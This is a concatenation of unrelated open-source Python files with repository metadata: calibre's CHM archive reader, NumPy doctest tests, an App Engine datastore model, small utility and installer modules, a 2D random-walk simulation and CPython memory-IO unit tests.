    0x140a : ('iso8859_1', "Spanish_Costa_Rica", "Western Europe & US"),
    0x180a : ('iso8859_1', "Spanish_Panama", "Western Europe & US"),
    0x1c0a : ('iso8859_1', "Spanish_Dominican_Repub", "Western Europe & US"),
    0x200a : ('iso8859_1', "Spanish_Venezuela", "Western Europe & US"),
    0x240a : ('iso8859_1', "Spanish_Colombia", "Western Europe & US"),
    0x280a : ('iso8859_1', "Spanish_Peru", "Western Europe & US"),
    0x2c0a : ('iso8859_1', "Spanish_Argentina", "Western Europe & US"),
    0x300a : ('iso8859_1', "Spanish_Ecuador", "Western Europe & US"),
    0x340a : ('iso8859_1', "Spanish_Chile", "Western Europe & US"),
    0x380a : ('iso8859_1', "Spanish_Uruguay", "Western Europe & US"),
    0x3c0a : ('iso8859_1', "Spanish_Paraguay", "Western Europe & US"),
    0x400a : ('iso8859_1', "Spanish_Bolivia", "Western Europe & US"),
    0x440a : ('iso8859_1', "Spanish_El_Salvador", "Western Europe & US"),
    0x480a : ('iso8859_1', "Spanish_Honduras", "Western Europe & US"),
    0x4c0a : ('iso8859_1', "Spanish_Nicaragua", "Western Europe & US"),
    0x500a : ('iso8859_1', "Spanish_Puerto_Rico", "Western Europe & US"),
    0x0441 : ('iso8859_1', "Swahili", "Western Europe & US"),
    0x041d : ('iso8859_1', "Swedish", "Western Europe & US"),
    0x081d : ('iso8859_1', "Swedish_Finland", "Western Europe & US"),
    0x0449 : (None, "Tamil", "Indic"),
    0x0444 : ('cp1251', "Tatar", "Cyrillic"),
    0x041e : ('iso8859_11',"Thai", "Thai"),
    0x041f : ('iso8859_9', "Turkish", "Turkish"),
    0x0422 : ('cp1251', "Ukrainian", "Cyrillic"),
    0x0420 : ('iso8859_6', "Urdu", "Arabic"),
    0x0443 : ('iso8859_9', "Uzbek_Latin", "Turkish"),
    0x0843 : ('cp1251', "Uzbek_Cyrillic", "Cyrillic"),
    0x042a : ('cp1258', "Vietnamese", "Vietnamese")
}
class CHMFile:
    "A class to manage access to CHM files."
    # Class-level defaults; GetArchiveInfo()/GetWindowsInfo() fill these in
    # after LoadCHM() opens an archive.
    filename = ""       # path of the currently open archive ('' when closed)
    file = None         # chmlib handle returned by chm_open()
    title = ""          # archive title, from /#SYSTEM entry 3
    home = "/"          # default (home) page path
    index = None        # path of the index (.hhk) file, if any
    topics = None       # path of the topics (.hhc) file, if any
    encoding = None     # raw charset description string from /#SYSTEM
    lcid = None         # Windows locale id of the archive
    binaryindex = None

    def __init__(self):
        # Whether full-text search is available; updated by GetArchiveInfo.
        self.searchable = 0

    def LoadCHM(self, archiveName):
        '''Loads a CHM archive.
        This function will also call GetArchiveInfo to obtain information
        such as the index file name and the topics file. It returns 1 on
        success, and 0 if it fails.
        '''
        # Close any archive that is already open before loading a new one.
        if (self.filename is not None):
            self.CloseCHM()

        self.file = chmlib.chm_open(archiveName)
        if (self.file is None):
            return 0

        self.filename = archiveName
        self.GetArchiveInfo()

        return 1

    def CloseCHM(self):
        '''Closes the CHM archive.
        This function will close the CHM file, if it is open. All variables
        are also reset.
        '''
        if (self.filename is not None):
            chmlib.chm_close(self.file)
            self.file = None
            self.filename = ''
            self.title = ""
            self.home = "/"
            self.index = None
            self.topics = None
            self.encoding = None

    def GetArchiveInfo(self):
        '''Obtains information on CHM archive.
        This function checks the /#SYSTEM file inside the CHM archive to
        obtain the index, home page, topics, encoding and title. It is called
        from LoadCHM.
        '''
        # extra.is_searchable crashed...
        # self.searchable = extra.is_searchable (self.file)
        self.searchable = False
        self.lcid = None

        result, ui = chmlib.chm_resolve_object(self.file, '/#SYSTEM')
        if (result != chmlib.CHM_RESOLVE_SUCCESS):
            sys.stderr.write('GetArchiveInfo: #SYSTEM does not exist\n')
            return 0

        # Read starting at offset 4 -- presumably skipping a 4-byte
        # version stamp at the head of #SYSTEM (TODO confirm).
        size, text = chmlib.chm_retrieve_object(self.file, ui, 4l, ui.length)
        if (size == 0):
            sys.stderr.write('GetArchiveInfo: file size = 0\n')
            return 0

        buff = array.array('B', text)

        # #SYSTEM is a sequence of entries: a 2-byte little-endian code,
        # a 2-byte little-endian length, then `length` bytes of data.
        index = 0
        while (index < size):
            # Entry code for the record starting at `index`.
            cursor = buff[index] + (buff[index+1] * 256)

            if (cursor == 0):
                # contents (.hhc) file name
                index += 2
                cursor = buff[index] + (buff[index+1] * 256)
                index += 2
                self.topics = '/' + text[index:index+cursor-1]
            elif (cursor == 1):
                # index (.hhk) file name
                index += 2
                cursor = buff[index] + (buff[index+1] * 256)
                index += 2
                self.index = '/' + text[index:index+cursor-1]
            elif (cursor == 2):
                # default (home) page
                index += 2
                cursor = buff[index] + (buff[index+1] * 256)
                index += 2
                self.home = '/' + text[index:index+cursor-1]
            elif (cursor == 3):
                # archive title
                index += 2
                cursor = buff[index] + (buff[index+1] * 256)
                index += 2
                self.title = text[index:index+cursor-1]
            elif (cursor == 4):
                # locale id: first 16-bit word of the entry data
                index += 2
                cursor = buff[index] + (buff[index+1] * 256)
                index += 2
                self.lcid = buff[index] + (buff[index+1] * 256)
            elif (cursor == 6):
                # compiled-file base name: use it to guess the .hhc/.hhk
                # paths if they were not given explicitly above.
                index += 2
                cursor = buff[index] + (buff[index+1] * 256)
                index += 2
                tmp = text[index:index+cursor-1]
                if not self.topics:
                    tmp1 = '/' + tmp + '.hhc'
                    tmp2 = '/' + tmp + '.hhk'
                    res1, ui1 = chmlib.chm_resolve_object(self.file, tmp1)
                    res2, ui2 = chmlib.chm_resolve_object(self.file, tmp2)
                    if (not self.topics) and \
                           (res1 == chmlib.CHM_RESOLVE_SUCCESS):
                        self.topics = '/' + tmp + '.hhc'
                    if (not self.index) and \
                           (res2 == chmlib.CHM_RESOLVE_SUCCESS):
                        self.index = '/' + tmp + '.hhk'
            elif (cursor == 16):
                # charset/font description string
                index += 2
                cursor = buff[index] + (buff[index+1] * 256)
                index += 2
                self.encoding = text[index:index+cursor-1]
            else:
                # unknown entry: read its length so the data can be skipped
                index += 2
                cursor = buff[index] + (buff[index+1] * 256)
                index += 2
            # advance past this entry's data
            index += cursor

        self.GetWindowsInfo()

        # Fall back to the compiled helper if #SYSTEM had no LCID entry.
        if not self.lcid:
            self.lcid = extra.get_lcid(self.file)

        return 1

    def GetTopicsTree(self):
        '''Reads and returns the topics tree.
        This auxiliary function reads and returns the topics tree file
        contents for the CHM archive.
        '''
        if (self.topics is None):
            return None

        if self.topics:
            res, ui = chmlib.chm_resolve_object(self.file, self.topics)
            if (res != chmlib.CHM_RESOLVE_SUCCESS):
                return None

        size, text = chmlib.chm_retrieve_object(self.file, ui, 0l, ui.length)
        if (size == 0):
            sys.stderr.write('GetTopicsTree: file size = 0\n')
            return None
        return text

    def GetIndex(self):
        '''Reads and returns the index tree.
        This auxiliary function reads and returns the index tree file
        contents for the CHM archive.
        '''
        if (self.index is None):
            return None

        if self.index:
            res, ui = chmlib.chm_resolve_object(self.file, self.index)
            if (res != chmlib.CHM_RESOLVE_SUCCESS):
                return None

        size, text = chmlib.chm_retrieve_object(self.file, ui, 0l, ui.length)
        if (size == 0):
            sys.stderr.write('GetIndex: file size = 0\n')
            return None
        return text

    def ResolveObject(self, document):
        '''Tries to locate a document in the archive.
        This function tries to locate the document inside the archive. It
        returns a tuple where the first element is zero if the function
        was successful, and the second is the UnitInfo for that document.
        The UnitInfo is used to retrieve the document contents
        '''
        if self.file:
            # path = os.path.abspath(document)
            path = document
            return chmlib.chm_resolve_object(self.file, path)
        else:
            return (1, None)

    def RetrieveObject(self, ui, start=-1, length=-1):
        '''Retrieves the contents of a document.
        This function takes a UnitInfo and two optional arguments, the first
        being the start address and the second is the length. These define
        the amount of data to be read from the archive.
        '''
        if self.file and ui:
            # NOTE(review): `len` shadows the builtin here; renaming it
            # would be a (trivial) code change, so just flagging it.
            if length == -1:
                len = ui.length
            else:
                len = length
            if start == -1:
                st = 0l
            else:
                st = long(start)
            return chmlib.chm_retrieve_object(self.file, ui, st, len)
        else:
            return (0, '')

    def Search(self, text, wholewords=0, titleonly=0):
        '''Performs full-text search on the archive.
        The first parameter is the word to look for, the second
        indicates if the search should be for whole words only, and
        the third parameter indicates if the search should be
        restricted to page titles.
        This method will return a tuple, the first item
        indicating if the search results were partial, and the second
        item being a dictionary containing the results.'''
        if text and text != '' and self.file:
            return extra.search(self.file, text, wholewords,
                                titleonly)
        else:
            return None

    def IsSearchable(self):
        '''Indicates if the full-text search is available for this
        archive - this flag is updated when GetArchiveInfo is called'''
        return self.searchable

    def GetEncoding(self):
        '''Returns a string that can be used with the codecs python package
        to encode or decode the files in the chm archive. If an error is
        found, or if it is not possible to find the encoding, None is
        returned.'''
        if self.encoding:
            # The encoding string is comma-separated; the third field is
            # the Windows charset number we map through charset_table.
            vals = string.split(self.encoding, ',')
            if len(vals) > 2:
                try:
                    return charset_table[int(vals[2])]
                except KeyError:
                    pass
        return None

    def GetLCID(self):
        '''Returns the (codec, language, region) tuple from locale_table
        for the archive's locale id, or None if the LCID is unknown.'''
        if self.lcid in locale_table:
            return locale_table[self.lcid]
        else:
            return None

    def get_encoding(self):
        # Best-effort codec lookup: prefer the explicit #SYSTEM charset,
        # fall back to the LCID's codec, and validate via codecs.lookup.
        ans = self.GetEncoding()
        if ans is None:
            lcid = self.GetLCID()
            if lcid is not None:
                ans = lcid[0]
        if ans:
            try:
                codecs.lookup(ans)
            except:
                ans = None
        return ans

    def GetDWORD(self, buff, idx=0):
        '''Internal method.
        Reads a double word (4 bytes) from a buffer.
        '''
        result = buff[idx] + (buff[idx+1]<<8) + (buff[idx+2]<<16) + \
                 (buff[idx+3]<<24)

        # 0xFFFFFFFF is used as an "unset" marker; normalize it to 0.
        if result == 0xFFFFFFFF:
            result = 0

        return result

    def GetString(self, text, idx):
        '''Internal method.
        Retrieves a NUL-terminated string starting at offset idx of the
        #STRINGS buffer.
        '''
        next = string.find(text, '\x00', idx)
        chunk = text[idx:next]
        return chunk

    def GetWindowsInfo(self):
        '''Gets information from the #WINDOWS file.
        Checks the #WINDOWS file to see if it has any info that was
        not found in #SYSTEM (topics, index or default page.
        '''
        result, ui = chmlib.chm_resolve_object(self.file, '/#WINDOWS')
        if (result != chmlib.CHM_RESOLVE_SUCCESS):
            return -1

        # #WINDOWS starts with two DWORDs: entry count and entry size.
        size, text = chmlib.chm_retrieve_object(self.file, ui, 0l, 8)
        if (size < 8):
            return -2

        buff = array.array('B', text)
        num_entries = self.GetDWORD(buff, 0)
        entry_size = self.GetDWORD(buff, 4)

        if num_entries < 1:
            return -3

        size, text = chmlib.chm_retrieve_object(self.file, ui, 8l, entry_size)
        if (size < entry_size):
            return -4

        buff = array.array('B', text)
        # Offsets 0x60/0x64/0x68 hold #STRINGS offsets for the TOC,
        # index and default-topic names -- presumably per the #WINDOWS
        # record layout (TODO confirm against the CHM format docs).
        toc_index = self.GetDWORD(buff, 0x60)
        idx_index = self.GetDWORD(buff, 0x64)
        dft_index = self.GetDWORD(buff, 0x68)

        result, ui = chmlib.chm_resolve_object(self.file, '/#STRINGS')
        if (result != chmlib.CHM_RESOLVE_SUCCESS):
            return -5

        size, text = chmlib.chm_retrieve_object(self.file, ui, 0l, ui.length)
        if (size == 0):
            return -6

        # Only fill in values that #SYSTEM did not already provide.
        if (not self.topics):
            self.topics = self.GetString(text, toc_index)
            if not self.topics.startswith("/"):
                self.topics = "/" + self.topics

        if (not self.index):
            self.index = self.GetString(text, idx_index)
            if not self.index.startswith("/"):
                self.index = "/" + self.index

        if (dft_index != 0):
            self.home = self.GetString(text, dft_index)
            if not self.home.startswith("/"):
                self.home = "/" + self.home
|
jelly/calibre
|
src/calibre/utils/chm/chm.py
|
Python
|
gpl-3.0
| 21,378
|
""" Doctests for NumPy-specific nose/doctest modifications
"""
#FIXME: None of these tests is run, because 'check' is not a recognized
# testing prefix.
# try the #random directive on the output line
def check_random_directive():
    # The docstring below IS the test: the "#random" directive tells the
    # numpy doctest plugin to accept any output for that example, so the
    # bogus repr should not cause a failure.
    '''
    >>> 2+2
    <BadExample object at 0x084D05AC> #random: may vary on your system
    '''
# check the implicit "import numpy as np"
def check_implicit_np():
    # Relies on the numpy doctest plugin injecting "np" into the doctest
    # namespace; no explicit import appears in this file.
    '''
    >>> np.array([1,2,3])
    array([1, 2, 3])
    '''
# there's some extraneous whitespace around the correct responses
def check_whitespace_enabled():
    # NOTE(review): per the comments inside, the expected outputs originally
    # carried extra whitespace around "3" and "7"; that whitespace may have
    # been stripped by tooling -- confirm against upstream before relying
    # on this test exercising whitespace normalization.
    '''
    # whitespace after the 3
    >>> 1+2
    3
    # whitespace before the 7
    >>> 3+4
    7
    '''
def check_empty_output():
    # The single statement example produces no output at all; this must not
    # trip the plugin's doctest-result-variable handling.
    """ Check that no output does not cause an error.
    This is related to nose bug 445; the numpy plugin changed the
    doctest-result-variable default and therefore hit this bug:
    http://code.google.com/p/python-nose/issues/detail?id=445
    >>> a = 10
    """
def check_skip():
    # The +SKIP directive must prevent execution; if the example ran it
    # would raise ZeroDivisionError.
    """ Check skip directive
    The test below should not run
    >>> 1/0 #doctest: +SKIP
    """
if __name__ == '__main__':
    # Run tests outside numpy test rig
    # (requires nose and its NumpyDoctest plugin; imports are deferred so
    # merely importing this module does not need nose installed).
    import nose
    from numpy.testing.noseclasses import NumpyDoctest
    argv = ['', __file__, '--with-numpydoctest']
    nose.core.TestProgram(argv=argv, addplugins=[NumpyDoctest()])
|
anntzer/numpy
|
numpy/testing/tests/test_doctesting.py
|
Python
|
bsd-3-clause
| 1,347
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from google.appengine.ext import ndb
import logging
class Usuario(ndb.Model):
    """Datastore model for a user (author name, role and work area)."""
    autor = ndb.StringProperty()    # author/user name
    rol = ndb.StringProperty()      # user role
    area = ndb.StringProperty()     # work area / department
    date = ndb.DateTimeProperty(auto_now_add=True)  # creation timestamp

    def get_usuario(cls, keyusuario):
        # Return the Usuario whose key equals keyusuario, or None.
        # NOTE(review): named "cls" but there is no @classmethod decorator,
        # so this is an instance method (see Problema.get_Problemas, which
        # calls it on an instance).
        result = None
        if keyusuario:
            # NOTE(review): filtering on Usuario._key to match a key --
            # confirm this behaves as intended versus keyusuario.get().
            q = cls.query().filter(Usuario._key == keyusuario).fetch(1)
            for element in q:
                result = element
        return result

    def get_autor(self, autor):
        # Return the first Usuario with the given autor value, or None.
        result = None
        if autor:
            q = cls.query().filter(ndb.GenericProperty('autor') == autor).fetch(1)
            for element in q:
                result = element
        return result
class Problema(ndb.Model):
    """Datastore model for a reported problem plus vote/answer counters."""
    titulo = ndb.StringProperty()               # problem title
    detalle = ndb.StringProperty()              # problem description
    vigencia = ndb.StringProperty()             # validity/active flag
    votos_count= ndb.IntegerProperty(default=0) # number of votes received
    resp_count = ndb.IntegerProperty(default=0) # number of answers received
    keyUsuario = ndb.KeyProperty(kind=Usuario)  # author of the problem
    time = ndb.DateTimeProperty(auto_now_add=True)

    def get_Problemakey(cls, Problemakey):
        # Return the Problema whose key equals Problemakey, or None.
        result = None
        if Problemakey:
            # NOTE(review): this filters on Usuario._key rather than the
            # Problema key -- looks like a copy/paste slip from
            # Usuario.get_usuario; confirm before relying on it.
            q = cls.query().filter(Usuario._key == Problemakey).fetch(1)
            for element in q:
                result = element
        return result

    def get_Problemas(cls):
        # Build {'element0': {...}, 'element1': {...}, ...} describing every
        # Problema joined with its author's Usuario record.
        result = {}
        usu = Usuario()
        q = cls.query()
        logging.info('q: %s', q)
        i = 0
        for e in q:
            # NOTE(review): usu is overwritten each iteration; if a lookup
            # returns None, the next iteration's get_usuario call will raise
            # AttributeError -- confirm keys always resolve.
            usu = usu.get_usuario(e.keyUsuario)
            # validate that the dictionary is built correctly
            element = {'titulo': e.titulo,
                       'detalle':e.detalle,
                       'votos_count': e.votos_count,
                       'resp_count': e.resp_count,
                       'autor': usu.autor,
                       'area':usu.area,
                       'time':e.time.strftime("%d/%m/%y %H:%M:%S"),
                       'vigencia': e.vigencia,
                       'id': e.key.urlsafe()}
            result['element' + str(i)] = element
            i = i + 1
        logging.info('result: %s', result)
        return result
class Respuesta(ndb.Model):
    """Datastore model for an answer (respuesta) to a Problema."""
    detalle = ndb.StringProperty()                  # answer text
    fecha_creacion = ndb.DateTimeProperty(auto_now_add=True)
    keyProblema = ndb.KeyProperty(kind=Problema)    # problem being answered
    keyUsuario = ndb.KeyProperty(kind=Usuario)      # answer author

    def get_respuestas(cls, keyProblema):
        # Return up to 50 Respuesta entities for the given Problema key,
        # or None when no key is supplied.
        result = None
        if keyProblema:
            q = Respuesta.query().filter(ndb.GenericProperty('keyProblema') == keyProblema).fetch(50)
            result = q
            logging.info('into get_respuestas : %s', result)
        return result
class Votacion(ndb.Model):
    """Datastore model for a vote/prize ticket linking a winning answer
    to the users involved and the prize awarded."""
    ticket = ndb.StringProperty()                   # prize ticket identifier
    keyPropuesta = ndb.KeyProperty(kind=Respuesta)  # winning answer
    keyProblema = ndb.KeyProperty(kind=Problema)    # related problem
    UsuarioGanador = ndb.StringProperty()           # winner's name
    UsuarioBenefactor = ndb.StringProperty()        # benefactor's name
    nombre_premio = ndb.StringProperty(default='cafe')  # prize name
    valor = ndb.FloatProperty(default=5.0)          # prize value
    proveedor = ndb.StringProperty(default='Degussi')   # prize provider
    vigencia = ndb.IntegerProperty(default=5)       # validity period

    def get_ganadores(cls):
        # Return up to 50 winner records, projected to the prize-related
        # fields only (no keys/answer bodies are materialized).
        q = Votacion.query().filter().fetch(50, projection = [Votacion.ticket, Votacion.UsuarioGanador,
                                Votacion.UsuarioBenefactor, Votacion.nombre_premio,
                                Votacion.valor, Votacion.proveedor, Votacion.vigencia])
        return q
|
jrevatta/daleuncafe
|
dcmodel.py
|
Python
|
apache-2.0
| 3,541
|
"""Useful methods and constants"""
import os
import telnetlib
import config
# General-ledger account codes used to categorize reimbursements
# (presumably institutional GL codes -- TODO confirm).
GL_GENERAL = "420226"
GL_MEETING_FOOD = "421000"
# TCP port the worker daemon listens on (used by worker_exec).
WORKER_PORT = 45451
# Mail header that marks a message to be ignored by the processor
# (presumably -- verify against the mail-handling caller).
IGNORE_HEADER = "X-Rfpme-Ignore"
def filename(id, ext):
    """
    Identifies the file with the given receipt ID and extension.

    Returns the path under config.STORE of the form NNNN.ext, with the
    receipt ID zero-padded to four digits.
    """
    # IDs arriving as strings (e.g. from a URL) are normalized to ints
    # so the zero-padded formatting below works.
    if isinstance(id, str):
        id = int(id)
    return os.path.join(config.STORE, "%04d.%s" % (id, ext))
def format_amount(cents):
    """
    Turns an amount in cents into a string in xxxx.xx format.

    Uses divmod (floor division) explicitly: the original relied on
    Python 2's integer "/", which silently becomes float division under
    Python 3; divmod pins the intended integer semantics on both.
    """
    return "%d.%02d" % divmod(cents, 100)
def moira_members_of_type(lst, t):
    """
    Lists the members of a Moira list of a given type. Returns None on
    error.
    """
    # Imported lazily so the rest of the module works without Moira.
    import moira
    moira.connect()
    try:
        entries = moira.query("get_members_of_list", lst)
        return [entry["member_name"]
                for entry in entries
                if entry["member_type"] == t]
    except moira.MoiraException:
        return None
def ldap_full_name(username):
    """
    Looks up a user's full name (CN) in LDAP, searching by username.

    Raises NameError unless exactly one directory entry matches.
    """
    # Imported lazily so the rest of the module works without python-ldap.
    import ldap
    base_dn = "ou=users,ou=moira,dc=mit,dc=edu"
    conn = ldap.open("ldap-too.mit.edu")
    matches = conn.search_s(base_dn, ldap.SCOPE_SUBTREE,
                            "(uid=%s)" % username, ["cn"])
    if len(matches) != 1:
        raise NameError("Could not uniquely match username %s in LDAP" %
                        username)
    # Each match is (dn, attrs); cn values are returned as a list.
    return matches[0][1]["cn"][0]
def worker_exec(cmd):
    """
    Executes cmd on the worker. Raises RemoteError on failure.

    Sends the command over a raw telnet connection and treats any reply
    other than "OK" as an error message.
    """
    conn = telnetlib.Telnet(config.WORKER, WORKER_PORT)
    conn.write(cmd)
    reply = conn.read_all().strip()
    conn.close()
    if reply != "OK":
        raise RemoteError(reply)
class RemoteError(Exception):
    # Raised by worker_exec when the worker replies with anything but "OK";
    # the exception argument carries the worker's reply text.
    pass
class IgnoreError(Exception):
    # Presumably raised when a message carries IGNORE_HEADER and should be
    # skipped -- no raiser is visible in this chunk; confirm at call sites.
    pass
|
btidor/rfpme
|
util.py
|
Python
|
mit
| 1,793
|
def random_walk_2D(np, ns, plot_step):
    """Simulate np particles each taking ns random unit steps in 2D.

    Every plot_step steps the particle cloud is plotted (and saved to an
    EPS file). Returns the final x and y position arrays.
    """
    xpositions = numpy.zeros(np)
    ypositions = numpy.zeros(np)
    # extent of the axis in the plot:
    xymax = 3*numpy.sqrt(ns); xymin = -xymax

    # direction code -> (dx, dy); codes 1..4 are north/south/west/east
    moves = {1: (0, 1), 2: (0, -1), 3: (-1, 0), 4: (1, 0)}

    for step in range(ns):
        for i in range(np):
            dx, dy = moves[random.randint(1, 4)]
            xpositions[i] += dx
            ypositions[i] += dy

        # Plot just every plot_step steps
        if (step+1) % plot_step == 0:
            plot(xpositions, ypositions, 'ko',
                 axis=[xymin, xymax, xymin, xymax],
                 title='%d particles after %d steps' %
                       (np, step+1),
                 savefig='tmp_%03d.eps' % (step+1))
    return xpositions, ypositions
# main program:
import random
random.seed(10)  # fixed seed so repeated runs are reproducible
import sys
import numpy
from scitools.std import plot

# Command line: walk2D.py <num_particles> <num_steps> <plot_step>
np = int(sys.argv[1]) # number of particles
ns = int(sys.argv[2]) # number of steps
plot_step = int(sys.argv[3]) # plot every plot_step steps
x, y = random_walk_2D(np, ns, plot_step)
|
qilicun/python
|
python3/src/random/walk2D.py
|
Python
|
gpl-3.0
| 1,296
|
import os
import logging
import subprocess
from urllib.request import urlopen
logger = logging.getLogger('vampire')
class Umask(object):
    """
    Change umask.

    Context manager that installs *mask* as the process umask on entry
    and restores the previous umask on exit.
    """

    def __init__(self, mask):
        #: umask to install while the context is active
        self.mask = mask

    def __enter__(self):
        # os.umask() swaps in the new mask and returns the old one,
        # which is kept for restoration.
        self.origin = os.umask(self.mask)

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Restore regardless of whether the body raised.
        os.umask(self.origin)
class PythonPackages(object):
    """
    Class abstracting Python
    packages.

    Bootstraps pip into the build target (via ez_setup on Python 2 builds)
    and then pip-installs the requested packages and/or requirements file.
    """
    def __init__(self, build, packages=None, requirements=None):
        """
        Set the constants.

        build: build object providing target, temporary_directory and
            is_three (Python 3 flag).
        packages: optional list of package names to install.
        requirements: optional path to a pip requirements file.
        Raises RuntimeError if the requirements file is unreadable.
        """
        self.build = build
        # argparse sets None if not given. Can't iterate over that later,
        # so set to empty list
        if packages and type(packages) == list:
            self.packages = packages
        else:
            self.packages = list()
        self.requirements = requirements
        if self.requirements:
            self.requirements = os.path.abspath(self.requirements)
            if not os.access(self.requirements, os.R_OK):
                raise RuntimeError("pip requirements file %s unreadable" % self.requirements)
        self.python_executable = os.path.join(self.build.target, 'bin/python')
        # Python 2 builds need setuptools bootstrapped first (ez_setup).
        if not self.build.is_three:
            self.ez_url = 'https://bootstrap.pypa.io/ez_setup.py'
            self.ez_path = os.path.join(self.build.temporary_directory, 'ez_setup.py')
            self.ez_executable = os.path.join(os.path.dirname(self.python_executable), 'easy_install')
        # Python 3 targets ship pip as "pip3"; Python 2 uses plain "pip".
        if self.build.is_three:
            self.pip_executable = os.path.join(os.path.dirname(self.python_executable), 'pip3')
        else:
            self.pip_executable = os.path.join(os.path.dirname(self.python_executable), 'pip')
    def __call__(self):
        """
        Run the methods.

        Bootstraps pip on Python 2 builds, then installs the packages.
        """
        if not self.build.is_three:
            self.pip()
        self.install()
    def pip(self):
        """
        Get and install pip.

        Downloads ez_setup.py (written with a restrictive umask), runs it
        with the build's interpreter, then easy_installs pip.
        Raises RuntimeError if either subprocess exits non-zero.
        """
        logger.info('Installing pip...')
        download = urlopen(self.ez_url)
        with Umask(0o0077):
            with open(self.ez_path, 'wb') as f:
                f.write(download.read())
        ez_process = subprocess.Popen([self.python_executable, self.ez_path])
        ez_process.wait()
        if ez_process.returncode != 0:
            # NOTE(review): communicate() after wait() with no pipes is a
            # no-op -- confirm intent (likely meant to drain output).
            ez_process.communicate()
            raise RuntimeError('Easy install exited with status %s' % ez_process.returncode)
        pip_process = subprocess.Popen([self.ez_executable, 'pip'])
        pip_process.wait()
        if pip_process.returncode != 0:
            pip_process.communicate()
            raise RuntimeError('Pip install exited with status %s' % pip_process.returncode)
        os.remove(self.ez_path)
        logger.info('...done.')
    def install(self):
        """
        Pip install the packages.

        Installs each named package, then the requirements file if given.
        Raises RuntimeError if any pip invocation exits non-zero.
        """
        for package in self.packages:
            logger.info('Installing %s...' % package)
            process = subprocess.Popen([self.pip_executable, 'install', package])
            process.wait()
            if process.returncode != 0:
                process.communicate()
                raise RuntimeError('Package install exited with status %s' % process.returncode)
            logger.info('...done.')
        if self.requirements:
            logger.info('Installing from %s...' % self.requirements)
            process = subprocess.Popen([self.pip_executable, 'install', '-r', self.requirements])
            process.wait()
            if process.returncode != 0:
                process.communicate()
                raise RuntimeError('Package install exited with status %s' % process.returncode)
            logger.info('...done.')
|
joedborg/vampire
|
vampire/packages.py
|
Python
|
gpl-2.0
| 3,718
|
"""Unit tests for memory-based file-like objects.
StringIO -- for unicode strings
BytesIO -- for bytes
"""
from __future__ import unicode_literals
from __future__ import print_function
import unittest
from test import test_support as support
import io
import _pyio as pyio
import pickle
class MemorySeekTestMixin:
    """Read/seek/tell tests shared by the BytesIO and StringIO test
    classes; concrete subclasses supply buftype, ioclass and EOF."""

    def testInit(self):
        buf = self.buftype("1234567890")
        bytesIo = self.ioclass(buf)

    def testRead(self):
        buf = self.buftype("1234567890")
        bytesIo = self.ioclass(buf)
        self.assertEqual(buf[:1], bytesIo.read(1))
        self.assertEqual(buf[1:5], bytesIo.read(4))
        self.assertEqual(buf[5:], bytesIo.read(900))
        self.assertEqual(self.EOF, bytesIo.read())

    def testReadNoArgs(self):
        buf = self.buftype("1234567890")
        bytesIo = self.ioclass(buf)
        self.assertEqual(buf, bytesIo.read())
        self.assertEqual(self.EOF, bytesIo.read())

    def testSeek(self):
        buf = self.buftype("1234567890")
        bytesIo = self.ioclass(buf)
        bytesIo.read(5)
        bytesIo.seek(0)
        self.assertEqual(buf, bytesIo.read())
        bytesIo.seek(3)
        self.assertEqual(buf[3:], bytesIo.read())
        # float positions must be rejected
        self.assertRaises(TypeError, bytesIo.seek, 0.0)

    def testTell(self):
        buf = self.buftype("1234567890")
        bytesIo = self.ioclass(buf)
        self.assertEqual(0, bytesIo.tell())
        bytesIo.seek(5)
        self.assertEqual(5, bytesIo.tell())
        # seeking past EOF is allowed and reflected by tell()
        bytesIo.seek(10000)
        self.assertEqual(10000, bytesIo.tell())
class MemoryTestMixin:
    """Behavioral tests shared by BytesIO and StringIO (both the C and
    pure-Python implementations); subclasses supply buftype, ioclass,
    EOF and UnsupportedOperation."""

    def test_detach(self):
        buf = self.ioclass()
        self.assertRaises(self.UnsupportedOperation, buf.detach)

    def write_ops(self, f, t):
        # Helper: exercises write/seek/tell/truncate on file object f,
        # converting literals with t (bytes or unicode constructor).
        self.assertEqual(f.write(t("blah.")), 5)
        self.assertEqual(f.seek(0), 0)
        self.assertEqual(f.write(t("Hello.")), 6)
        self.assertEqual(f.tell(), 6)
        self.assertEqual(f.seek(5), 5)
        self.assertEqual(f.tell(), 5)
        self.assertEqual(f.write(t(" world\n\n\n")), 9)
        self.assertEqual(f.seek(0), 0)
        self.assertEqual(f.write(t("h")), 1)
        self.assertEqual(f.truncate(12), 12)
        self.assertEqual(f.tell(), 1)

    def test_write(self):
        buf = self.buftype("hello world\n")
        memio = self.ioclass(buf)
        self.write_ops(memio, self.buftype)
        self.assertEqual(memio.getvalue(), buf)
        memio = self.ioclass()
        self.write_ops(memio, self.buftype)
        self.assertEqual(memio.getvalue(), buf)
        self.assertRaises(TypeError, memio.write, None)
        memio.close()
        self.assertRaises(ValueError, memio.write, self.buftype(""))

    def test_writelines(self):
        buf = self.buftype("1234567890")
        memio = self.ioclass()
        self.assertEqual(memio.writelines([buf] * 100), None)
        self.assertEqual(memio.getvalue(), buf * 100)
        memio.writelines([])
        self.assertEqual(memio.getvalue(), buf * 100)
        memio = self.ioclass()
        self.assertRaises(TypeError, memio.writelines, [buf] + [1])
        self.assertEqual(memio.getvalue(), buf)
        self.assertRaises(TypeError, memio.writelines, None)
        memio.close()
        self.assertRaises(ValueError, memio.writelines, [])

    def test_writelines_error(self):
        memio = self.ioclass()
        # Generator raising mid-iteration: the exception must propagate.
        def error_gen():
            yield self.buftype('spam')
            raise KeyboardInterrupt
        self.assertRaises(KeyboardInterrupt, memio.writelines, error_gen())

    def test_truncate(self):
        buf = self.buftype("1234567890")
        memio = self.ioclass(buf)
        self.assertRaises(ValueError, memio.truncate, -1)
        memio.seek(6)
        self.assertEqual(memio.truncate(), 6)
        self.assertEqual(memio.getvalue(), buf[:6])
        self.assertEqual(memio.truncate(4), 4)
        self.assertEqual(memio.getvalue(), buf[:4])
        # truncate() accepts long objects
        self.assertEqual(memio.truncate(4L), 4)
        self.assertEqual(memio.getvalue(), buf[:4])
        # truncate() must not move the stream position
        self.assertEqual(memio.tell(), 6)
        memio.seek(0, 2)
        memio.write(buf)
        self.assertEqual(memio.getvalue(), buf[:4] + buf)
        pos = memio.tell()
        self.assertEqual(memio.truncate(None), pos)
        self.assertEqual(memio.tell(), pos)
        self.assertRaises(TypeError, memio.truncate, '0')
        memio.close()
        self.assertRaises(ValueError, memio.truncate, 0)

    def test_init(self):
        buf = self.buftype("1234567890")
        memio = self.ioclass(buf)
        self.assertEqual(memio.getvalue(), buf)
        memio = self.ioclass(None)
        self.assertEqual(memio.getvalue(), self.EOF)
